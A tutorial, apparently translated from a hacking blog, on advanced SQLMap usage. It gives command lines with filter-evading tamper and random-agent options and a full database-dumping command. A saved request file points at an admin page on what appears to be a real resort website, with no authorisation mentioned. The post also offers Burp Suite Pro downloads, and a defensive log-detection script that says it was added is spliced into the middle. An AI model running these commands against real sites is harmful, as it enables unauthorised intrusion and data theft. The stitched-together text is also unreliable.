SQLMap is a tool that automates the exploitation of SQL injection, saving a lot of time compared with manual exploitation. I already have instructions on basic SQLMap usage; however, SQLMap also has advanced parameters that save time and make testing more efficient. Here are some advanced SQLMap usage techniques for exploiting SQL injection flaws.
How to use advanced SQLMap
I will briefly talk about how to install and use SQLMap first:
Use --batch
To make SQLMap run automatically and skip the yes/no questions
Use *
To mark the injection location
Use --string="String_in_the_response"
To tell SQLMap which string appears in the response when the injection succeeds (True)
sqlmap -u "https://anonyviet.com/s.php?q=test" -p "q"
sqlmap -r request.txt
sqlmap -m urls.txt
sqlmap -u "http://afine.com/user/*" -H "User-agent: *"
sqlmap -r request.txt --second-order "http://afine.com/avatar"
--random-agent
--batch
--risk=3 --level=5
--proxy=http://127.0.0.1:8080
-v 0
-v 4
--output-dir=sqlmap
--prefix "this_string_must_be_before_injection"
--suffix "--this_string_must_be_at_the_end_of_injection"
sqlmap -u "https://afine.com/s.php?q=1" -p 'q' --eval='q=q.replace(" ","%20")'
--tamper="PATH_OR_NAME_OF_TAMPER_SCRIPT"
-H "Auth_header: secret1" -H "Cookie: auth2=secret2"
python sqlmap.py -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch
POST request: to inject into the username field, put * in username=
POST //index.php?module=user&function=login HTTP/1.1
Host: anonyviet.com

username=*&password=1
Save the file as request.txt and put it in the sqlmap folder
GET request:
GET /admin/index.php?option=tin-sua&tin_id=1 HTTP/1.1
Host: phanthiet.terracottaresort.com
Save the file as request.txt and put it in the sqlmap folder
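On the defensive side of the full command above: --random-agent removes the default sqlmap/... User-Agent and --tamper=space2comment replaces spaces with /**/, so log detection has to inspect the request itself rather than the User-Agent alone. The Python sketch below is an added example, not code from this article or from the SQLMap project; the log lines, rule names and regexes are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Access-log lines in combined format, constructed for this example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /s.php?q=test HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /s.php?q=salt+and+pepper HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /s.php?q=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /s.php?q=1%2F**%2FAND%2F**%2FSLEEP(20) HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
KEYWORDS = r"(?:and|or|union|select|from|where|waitfor)"
# Rule names and patterns are this example's own; they run on the URL-decoded target.
RULES = {
    # space2comment swaps spaces for /**/, so a comment glued to a SQL keyword stands out.
    "comment_spacing": re.compile(rf"/\*\*/{KEYWORDS}\b|\b{KEYWORDS}/\*\*/", re.I),
    # Delay functions used by time-based blind tests (the --time-sec value is the argument).
    "time_delay": re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    "boolean_test": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
}

def classify(line):
    """Return the set of rule names one log line triggers (empty if clean or unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return set()
    _ip, target, agent = m.groups()
    hits = set()
    if agent.lower().startswith("sqlmap/"):  # only present without --random-agent
        hits.add("default_ua")
    decoded = unquote_plus(target)
    if RULES["comment_spacing"].search(decoded):
        hits.add("comment_spacing")
    # Collapse inline comments to spaces so the tamper cannot hide the other patterns.
    normalized = re.sub(r"/\*.*?\*/", " ", decoded)
    for name in ("time_delay", "boolean_test"):
        if RULES[name].search(normalized):
            hits.add(name)
    return hits

def scan(lines):
    """Map each client IP to the sorted rule names its requests triggered."""
    report = {}
    for line in lines:
        hits = classify(line)
        if hits:
            report.setdefault(line.split(" ", 1)[0], set()).update(hits)
    return {ip: sorted(rules) for ip, rules in report.items()}

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, rules)
```

The third sample client is caught by its User-Agent, while the fourth is caught only by the payload rules, which is why User-Agent matching cannot be the sole signal.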
Use Burp Suite Pro Extension
Download Burp Suite Pro here
- Request Timer – Capture timed response packets (suitable for blind sql injection).
- Burp Bounty Pro: automatically search for security holes with Burp Suite Pro (if you need this extension, comment below, I will send it separately)
Any SQLi found by SQLiPy will be added to the Results tab in Burp Suite.
Payload SQL Injection
A collection of payloads for testing SQL injection is here: PayloadsAllTheThings.
Download the SQLMap cheat sheet here: https://github.com/anonyvietofficial/sqlmap-cheatsheet